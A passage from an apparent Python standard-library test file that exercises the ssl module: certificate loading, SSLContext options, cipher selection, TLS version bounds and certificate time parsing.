self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@requires_minimum_version
@unittest.skipIf(IS_LIBRESSL, "see bpo-34001")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
minimum_range = {
# stock OpenSSL
ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2
}
maximum_range = {
# stock OpenSSL
ssl.TLSVersion.MAXIMUM_SUPPORTED,
# Fedora 32 uses TLS 1.3 by default
ssl.TLSVersion.TLSv1_3
}
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertIn(
ctx.maximum_version, maximum_range
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertIn(
ctx.minimum_version, minimum_range
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
